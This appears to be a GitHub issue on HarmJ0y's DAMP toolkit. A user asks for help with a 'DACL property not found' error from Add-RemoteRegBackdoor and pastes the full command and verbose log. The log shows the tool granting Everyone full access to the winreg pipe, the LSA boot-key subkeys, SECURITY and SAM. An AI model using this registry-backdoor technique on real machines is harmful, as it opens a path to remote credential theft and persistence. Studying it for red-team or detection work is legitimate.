DAMP icon indicating copy to clipboard operation
DAMP copied to clipboard

Published 20 hours ago verified publisher icon HarmJ0y

The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.

Open tuv7041 opened this issue 4 years ago • 0 comments

Hi, I'm trying Add-RemoteRegBackdoor.ps1 on a domain joined windows 10 machine, and I get the following error on all registry keys:

The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.

Any idea on what might be wrong? I'm attaching the output, but github's markdown makes it difficult to read. Here's the paste just in case: https://pastebin.com/sbZVfwmn

Thanks!

`PS Microsoft.PowerShell.Core\FileSystem::\DAMP> Add-RemoteRegBackdoor -Trustee 'S-1-1-0' -ComputerName DESKTOP-13DT5NH -Verbose VERBOSE: [DESKTOP-13DT5NH : ] Using trustee username 'Everyone' Get-WMIObject : The RPC server is unavailable. (Exception from HRESULT: 0x800706BA) At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:185 char:36

  • ... iceObject = Get-WMIObject -Class Win32_Service -Filter "name='RemoteR ...
  •             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    • CategoryInfo : InvalidOperation: (:) [Get-WmiObject], COMException
    • FullyQualifiedErrorId : GetWMICOMException,Microsoft.PowerShell.Commands.GetWmiObjectCommand

VERBOSE: [DESKTOP-13DT5NH] Remote registry is not running, attempting to start Add-RemoteRegBackdoor : [DESKTOP-13DT5NH] Error interacting with the remote registry service: You cannot call a method on a null-valued expression. At line:1 char:1

  • Add-RemoteRegBackdoor -Trustee 'S-1-1-0' -ComputerName DESKTOP-16QT4E ...
  •   + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
  + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Add-RemoteRegBackdoor

PS Microsoft.PowerShell.Core\FileSystem::\vmware-host\Shared Folders\share\DAMP> Add-RemoteRegBackdoor -Trustee 'S-1-1-0' -ComputerName DESKTOP-13DT5NH -Verbose VERBOSE: [DESKTOP-13DT5NH : ] Using trustee username 'Everyone' VERBOSE: [DESKTOP-13DT5NH] Remote registry is not running, attempting to start VERBOSE: [DESKTOP-13DT5NH] Attaching to remote registry through StdRegProv VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring started for key VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the trustee WMI object with user 'Everyone' VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee to new Ace The property 'DACL' cannot be found on this object. Verify that the property exists and can be set. At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13

  •         $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject

  •         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    • CategoryInfo : InvalidOperation: (:) [], RuntimeException
    • FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring completed for key VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 'Everyone' VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace The property 'DACL' cannot be found on this object. Verify that the property exists and can be set. At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13

  •         $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject

  •         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    • CategoryInfo : InvalidOperation: (:) [], RuntimeException
    • FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for key VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object with user 'Everyone' VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new Ace The property 'DACL' cannot be found on this object. Verify that the property exists and can be set. At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13

  •         $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject

  •         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    • CategoryInfo : InvalidOperation: (:) [], RuntimeException
    • FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object with user 'Everyone' VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace The property 'DACL' cannot be found on this object. Verify that the property exists and can be set. At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13

  •         $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject

  •         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    • CategoryInfo : InvalidOperation: (:) [], RuntimeException
    • FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for key VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object with user 'Everyone' VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace The property 'DACL' cannot be found on this object. Verify that the property exists and can be set. At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13

  •         $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject

  •         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    • CategoryInfo : InvalidOperation: (:) [], RuntimeException
    • FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for key VERBOSE: [DESKTOP-13DT5NH : SECURITY] Backdooring started for key VERBOSE: [DESKTOP-13DT5NH : SECURITY] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [DESKTOP-13DT5NH : SECURITY] Creating the trustee WMI object with user 'Everyone' VERBOSE: [DESKTOP-13DT5NH : SECURITY] Applying Trustee to new Ace The property 'DACL' cannot be found on this object. Verify that the property exists and can be set. At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13

  •         $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject

  •         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    • CategoryInfo : InvalidOperation: (:) [], RuntimeException
    • FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SECURITY] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [DESKTOP-13DT5NH : SECURITY] Backdooring completed for key VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Backdooring started for key VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'Everyone' VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Applying Trustee to new Ace The property 'DACL' cannot be found on this object. Verify that the property exists and can be set. At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13

  •         $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject

  •         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    • CategoryInfo : InvalidOperation: (:) [], RuntimeException
    • FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Backdooring completed for key VERBOSE: [DESKTOP-13DT5NH] Backdooring completed for system

ComputerName BackdoorTrustee

DESKTOP-13DT5NH S-1-1-0 `

tuv7041 avatar Apr 14 '20 21:04 tuv7041